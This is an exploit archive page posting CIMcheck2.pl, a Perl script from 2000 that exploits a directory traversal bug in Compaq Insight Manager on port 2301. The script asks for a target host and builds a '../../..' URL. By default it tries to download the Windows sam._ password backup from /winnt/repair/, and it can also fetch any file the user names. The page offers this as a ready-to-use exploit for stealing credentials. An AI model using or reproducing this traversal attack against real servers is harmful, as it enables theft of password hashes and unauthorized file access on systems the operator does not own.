exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CIMcheck2.pl

CIMcheck2.pl
Posted Sep 1, 2000
Authored by Neon | Site TheGovernment.com

CIMcheck2.pl is an updated version of the CIMcheck.pl exploit checker for the Compaq Insight Manager root dot dot bug. Updates include: Fixed Errors and Better Input features. The remote webserver must be running NT with port 2301 open. The exploit opens up the full vulnerable url and attempts to get the sam._ backup password file from the remote repa ir directory. You can specify which file you want to download, default is the /wi k nnt/repair/ directory and the sam._ backup password file.

tags | exploit, remote, root
SHA-256 | e61a8564d2ced7114295c1a3afdbb9445be64ee4696516061c8a0e67388605de

CIMcheck2.pl

Change Mirror Download
#! c:\perl\bin\perl.exe

# CIMcheck 1.2 - Compaq Insight Manager Exploit Checker By Neon-Lenz
# ------------------------------------------------------------------
# Yea i know this little script is very easy to code and lame, but
# what the hell. This should do the job. Assuming i'm still learning Perl..
# Still i'll try to do my best and code a better script next time!
# Greets to: Acid Blades, B-r00t, KGB, ThePike and Trib.
# -Neon-Lenz. - neonlenz@nightmail.com

# Usage: perl CIMcheck2.pl

print <<"EOT";

CIMcheck 1.2 - Compaq Insight Manager Exploit Checker By Neon-Lenz
------------------------------------------------------------------
CIMcheck 1.2 checks for the (in)famous Compaq Insight Manager
"root dot dot bug". To check this the remote webserver MUST be
running NT, the script will not work on Novell Netware and hosts
with ports other then 2301 open. e-mail: neonlenz\@nightmail.com

Description:
-----------
This little exploit-script opens up the exploitable url and when using
default the script will attempt to get the sam._ backup password file
from the remote /winnt/repair/ directory. The cool option is that you can
specify which file you want to download, default is the /winnt/repair/
directory and the sam._ backup password file. But if you assign the script
like this: directory /winnt/ and file win.ini, then it will try to
download the win.ini file from the winnt directory from the remote webserver.

Usage: perl CIMcheck2.pl

EOT

print <<"EOT";

Please type in the remote webserver, ex: www.microsoft.com
(default remote webserver is "www.microsoft.com") :

EOT

$host = <>;

print <<"EOT";

Please type in the directory where the file is located you want to download,
ex: /winnt/repair/
(default directory is "/winnt/repair/") :

EOT

$directory = <> || "/winnt/repair/";

print <<"EOT";

Please type in the filename you want ex: sam._ or blabla.asp
(default file is "sam._") :

EOT

$file = <> || "sam._";

{
system("explorer.exe", "http://$host:2301/../../..$directory$file");
}

print <<"EOT";

Ok thanks, fetching the requested file...

EOT

print "CIMcheck.pl By Neon-Lenz - email: neonlenz\@nightmail.com\n";

#Yea, no more code, so stop reading it you jerk! ;D
#Visit our website at http://TheGovernment.com/Cyrax



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close